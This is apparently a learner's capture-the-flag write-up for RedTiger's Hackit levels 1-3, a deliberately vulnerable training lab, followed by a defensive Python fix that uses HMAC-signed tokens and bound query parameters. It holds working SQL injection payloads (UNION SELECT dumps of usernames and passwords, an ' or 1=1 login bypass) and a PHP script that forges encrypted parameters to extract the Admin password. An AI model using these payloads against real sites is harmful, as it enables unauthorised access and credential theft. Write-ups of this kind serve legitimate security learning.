RedTiger's Hackit (levels 1-3)


URL: redtiger.labs.overthewire.org/

level1.


Running a dictionary against the login form got nowhere, so I was out of ideas. I went to look at the answer and found that clicking a category passes a parameter directly...

https://redtiger.labs.overthewire.org/level1.php?cat=1

Changing the GET parameter from ?cat=1 to ?cat=2-1 still gives the normal response, so this is an unquoted numeric injection. I entered the following payload: cat=-1 union select group_concat(column_name) from information_schema.columns where table_name=level1_users

The page just responded "some things is disable", so I was stuck again. I looked at the answer and realized I had been flailing around. The correct approach is:

1. cat=1 order by i # Increase i to find how many columns the current table has. There are in fact 4 columns; with i>4 the page no longer renders normally.

2. cat=-1 union select 1,2,3,4 # Find out which columns the front end displays. In this level it shows 3 and 4.

3. Since the table name is given, combine it with guessed column names and enter cat=-1 union select 1,2,Username,Password from level1_users # to get the answer.

level2.


The hint is "condition"; entering ' or 1=1 # as both username and password gets you through.

level3.

Goal: obtain the Admin password

Clicking show userdetails sends a GET request carrying this: usr=MDQyMjExMDE0MTgyMTQw

and then this table is displayed.


Obviously we need to change usr to query the table. But usr is encrypted, so that is not directly possible. The hint says to use an error message, but I spent ages without producing one. A peek at the answer showed some excellent information gathering:

Passing an array via GET triggers an error. Visiting https://redtiger.labs.overthewire.org/level3.php?usr[]

produces the error

Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 26

Then go straight to

https://redtiger.labs.overthewire.org/urlcrypt.inc

Ctrl+U to view the source, which reveals the encryption and decryption code:

<?php

	// warning! ugly code ahead :)
	// requires php5.x, sorry for that
  		
	function encrypt($str)
	{
		$cryptedstr = "";
		srand(3284724);
		for ($i =0; $i < strlen($str); $i++)
		{
			$temp = ord(substr($str,$i,1)) ^ rand(0, 255);
			
			while(strlen($temp)<3)
			{
				$temp = "0".$temp;
			}
			$cryptedstr .= $temp. "";
		}
		return base64_encode($cryptedstr);
	}
  
	function decrypt ($str)
	{
		srand(3284724);
		if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
		{
			$str = base64_decode($str);
			if ($str != "" && $str != null && $str != false)
			{
				$decStr = "";
				
				for ($i=0; $i < strlen($str); $i+=3)
				{
					$array[$i/3] = substr($str,$i,3);
				}

				foreach($array as $s)
				{
					$a = $s ^ rand(0, 255);
					$decStr .= chr($a);
				}
				
				return $decStr;
			}
			return false;
		}
		return false;
	}
?>

The random seed is fixed, so you can just write an exploit that encrypts whatever statement you want to inject. From there the approach is the same as level1; the steps are recorded in the exploit below.

<?php
	function encrypt($str)
	{
		$cryptedstr = "";
		srand(3284724);
		for ($i =0; $i < strlen($str); $i++)
		{
			$temp = ord(substr($str,$i,1)) ^ rand(0, 255);
			
			while(strlen($temp)<3)
			{
				$temp = "0".$temp;
			}
			$cryptedstr .= $temp. "";
		}
		return base64_encode($cryptedstr);
	}
	#$payload="admin' order by 8 #"; # the maximum is 7
	#$payload="' union select 1,2,3,4,5,6,7 #"; # columns 2, 6, 7, 5, 4 are all displayed
	$payload="' union select 1,password,3,4,5,6,7 from level3_users where username='Admin' #";
	echo encrypt($payload);
?>
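For contrast, here is a defender-side version of the usr parameter, added to this writeup and not code from the challenge site: the value is bound to a secret-keyed HMAC tag instead of a fixed-seed XOR, and the lookup binds the username as a query parameter. The secret key, the in-memory level3_users table and its passwords are constructed for the example.

```python
import base64
import hashlib
import hmac
import os
import sqlite3

# Constructed server-side secret: unlike the fixed srand() seed in urlcrypt.inc,
# this is never derivable from the page source. Load it from config in practice.
SECRET_KEY = os.urandom(32)

def sign_usr(username: str, key: bytes = SECRET_KEY) -> str:
    """Build the ?usr= value as base64url(username) + '.' + HMAC-SHA256 tag."""
    body = base64.urlsafe_b64encode(username.encode()).decode().rstrip("=")
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"

def verify_usr(token: str, key: bytes = SECRET_KEY):
    """Return the username if the tag verifies, otherwise None."""
    if token.count(".") != 1:
        return None
    body, tag = token.split(".")
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return None
    try:
        return base64.urlsafe_b64decode(body + "=" * (-len(body) % 4)).decode()
    except (ValueError, UnicodeDecodeError):
        return None

def _build_db() -> sqlite3.Connection:
    # Constructed in-memory stand-in for the challenge's level3_users table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE level3_users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO level3_users VALUES (?, ?)",
                    [("Admin", "example-admin-pw"), ("Test", "example-test-pw")])
    return con

DB = _build_db()

def lookup_user(username: str):
    """Bound parameter: quotes or UNION inside the value stay plain data."""
    row = DB.execute("SELECT username FROM level3_users WHERE username = ?",
                     (username,)).fetchone()
    return row[0] if row else None

def handle_request(usr_token: str):
    """Server-side handling of show userdetails: verify the tag, then bind."""
    name = verify_usr(usr_token)
    return None if name is None else lookup_user(name)
```

With this, the level3 trick no longer works: a token built without the key fails verification, and even a validly signed value containing the union payload is looked up as a literal username and matches nothing.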

Afterword: I can't seem to get anything right; there is still a long way to go.